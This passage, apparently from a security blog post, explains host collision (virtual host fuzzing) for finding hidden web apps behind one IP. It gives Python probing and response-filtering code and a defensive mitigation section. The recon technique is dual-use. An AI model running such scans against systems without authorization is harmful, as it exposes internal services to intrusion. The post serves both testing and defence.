and standard web testing. 0x06 Host collision vs. DNS brute-forcing They’re related, but not the same thing:\nDNS brute force Ask DNS for foo.example.com, bar.example.com, … If there’s a record, you get an IP. No record? DNS says “NXDOMAIN”. Host collision / vhost fuzzing You already have an IP. You send HTTP requests to that IP with different Host headers. You observe differences in HTTP responses. Key difference:\nDNS brute-forcing enumerates published names (what DNS wants you to know). Host collision enumerates routable names (what the HTTP stack will actually route). 
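That published-vs-routable gap can be made concrete with Python's standard library. This is only a sketch under assumed placeholders (`admin.internal.example.com`, `203.0.113.10`), not a hardened scanner:

```python
import socket
import http.client

def dns_brute(name):
    """DNS brute force: ask the resolver whether the name is published."""
    try:
        return socket.getaddrinfo(name, 80)[0][4][0]  # first resolved address
    except socket.gaierror:
        return None  # NXDOMAIN: DNS says "no such host"

def vhost_probe(ip, host, port=80, timeout=5):
    """Host collision: connect by IP, select the vhost via the Host header."""
    conn = http.client.HTTPConnection(ip, port, timeout=timeout)
    try:
        conn.putrequest("GET", "/", skip_host=True)  # we set Host ourselves
        conn.putheader("Host", host)
        conn.putheader("Connection", "close")
        conn.endheaders()
        resp = conn.getresponse()
        return resp.status, len(resp.read())  # status + size for fingerprinting
    finally:
        conn.close()

# dns_brute("admin.internal.example.com")  -> often None (name not published)
# vhost_probe("203.0.113.10", "admin.internal.example.com")
#   -> may still reach a real app if the front-end routes on Host alone
```

The `skip_host=True` flag is what lets us decouple the Host header from the address we actually connected to.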
Sometimes there’s a perfect overlap. In interesting cases, there isn’t – which is exactly why host collision is valuable.\n0x07 Defensive notes: how not to get “collided” From the blue-team perspective, host collision points to two underlying issues:\nOver-trusting Host without proper scoping. Letting internal vhosts ride on public-facing front-ends. Some practical mitigations:\nSeparate public and internal vhosts Don’t put admin/dev/internal vhosts on the same public IP / listener as external apps. At least restrict them at the network level (VPN-only, office IPs, etc.). Tight default / fallback behavior For unknown Host, return a minimal error (or drop). Don’t route to real apps as fallback. Avoid verbose default pages leaking server info. Host header whitelisting Front-end/WAF only allows known, intended hostnames. Everything else → fixed error / drop. Regular self-scanning From the Internet, run your own vhost fuzzing against your IP ranges. Compare discovered vhosts vs. intended DNS records. If something is routable but not in DNS, decide if it really should be reachable. 0x08 Summary Host collision is one of those techniques that:\nIs conceptually simple; Leverages a very old piece of the web stack (HTTP/1.1 Host); Still reveals surprising amounts of attack surface in modern, virtual-host-heavy environments. The core ideas to remember:\nIP decides who you talk to; Host decides who you ask for. DNS is one way to map names to IPs, but HTTP routing doesn’t depend on public DNS being “truthful”. A single IP / load balancer can hide hundreds of apps; if you don’t check vhosts, you might miss most of your scope. 
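As a closing illustration, the similarity filtering from 5.4 is also only a few lines. A minimal character-shingle/Jaccard sketch follows; the 0.8 threshold and the sample pages are assumptions for demonstration, not values taken from any of the tools above:

```python
def shingles(text, k=4):
    """Character k-grams of a response body."""
    return {text[i:i + k] for i in range(max(len(text) - k + 1, 1))}

def jaccard(a, b):
    """Jaccard similarity of two shingle sets."""
    union = len(a | b)
    return len(a & b) / union if union else 1.0

def interesting(baseline_body, candidate_body, threshold=0.8):
    """Flag responses that diverge from the per-IP baseline page."""
    return jaccard(shingles(baseline_body), shingles(candidate_body)) < threshold

# Baseline: the generic page most Host values get on this IP
base = "<html><title>Welcome to nginx</title><body>default</body></html>"
print(interesting(base, base))  # False: same generic page, filtered out
print(interesting(base,         # True: a login page diverging from baseline
      "<html><title>Admin Console</title><form action='/login'>...</form></html>"))
```

In practice you would compute one baseline per IP and keep only the (ip, host) pairs whose bodies come back `interesting`.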
Whether you use my HostCollision or any other tool, having vhost enumeration in your recon playbook is absolutely worth it – both for offense (finding hidden assets) and for defense (discovering accidental exposures before someone else does).\n","permalink":"https://blacksugar.top/posts/host_collision/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis post is a review of my notes on \u003cem\u003ehost collision\u003c/em\u003e (virtual host enumeration) – what it is, how it works, and why it still matters today.\u003cbr\u003e\nIt also doubles as a “design doc” for my tool \u003cstrong\u003e\u003ca href=\"https://github.com/black5ugar/HostCollision\"\u003eHostCollision\u003c/a\u003e\u003c/strong\u003e.\u003c/p\u003e\u003c/blockquote\u003e\n\u003ch2 id=\"0x00-motivation-when-ports-are-open-but-the-site-is-missing\"\u003e0x00 Motivation: When ports are open but the site is “missing”\u003c/h2\u003e\n\u003cp\u003eTypical recon story:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eYou do IP/port scanning, find lots of 80/443/8080/8443.\u003c/li\u003e\n\u003cli\u003eYou open them in a browser full of hope.\u003c/li\u003e\n\u003cli\u003eYou get 403, 404, “Welcome to nginx”, Tomcat default page, random WAF splash screens…\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eClearly, \u003cem\u003esomething\u003c/em\u003e is running there, but not necessarily the app you’re after.\u003c/p\u003e","title":"「松子」Host Collision 101: Finding Hidden Assets Behind a Single IP"}]